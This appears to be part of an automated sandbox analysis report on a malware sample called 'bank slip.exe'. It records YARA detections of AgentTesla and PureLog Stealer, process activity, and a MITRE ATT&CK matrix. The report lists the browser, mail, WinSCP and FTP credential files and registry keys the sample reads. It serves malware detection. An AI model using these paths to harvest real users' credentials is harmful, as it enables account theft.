                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeQueries volume information: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                        Source: C:\Users\user\Desktop\bank slip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000002.3246056841.0000000003092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2091471993.0000000003042000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: bank slip.exe PID: 6756, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7292, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: mKSjGvfmIulVB.exe PID: 7552, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7684, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 0.2.bank slip.exe.260f66c.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.6750000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.6750000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.33cd7dc.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.33cc7c4.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.298d6c8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.298c6b0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.2952c78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.3392d98.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.260f66c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2074900045.0000000006750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2071630541.0000000002916000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2121255868.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: bank slip.exe PID: 6756, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7292, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: mKSjGvfmIulVB.exe PID: 7552, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7684, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000002.3246056841.0000000003092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2091471993.0000000003042000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: bank slip.exe PID: 6756, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7292, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: mKSjGvfmIulVB.exe PID: 7552, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7684, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 0.2.bank slip.exe.260f66c.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.6750000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.6750000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.33cd7dc.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.33cc7c4.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.298d6c8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.298c6b0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.2952c78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.3392d98.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.bank slip.exe.260f66c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2074900045.0000000006750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2071630541.0000000002916000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2121255868.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		11
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Input Capture                        		24
                        System Information Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAt1
                        Registry Run Keys / Startup Folder                        		1
                        Scheduled Task/Job                        		3
                        Obfuscated Files or Information                        		1
                        Credentials in Registry                        		211
                        Security Software Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        Registry Run Keys / Startup Folder                        		22
                        Software Packing                        		NTDS1
                        Process Discovery                        		Distributed Component Object Model1
                        Input Capture                        		11
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets141
                        Virtualization/Sandbox Evasion                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                        Virtualization/Sandbox Evasion                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                        Process Injection                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Hidden Files and Directories                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
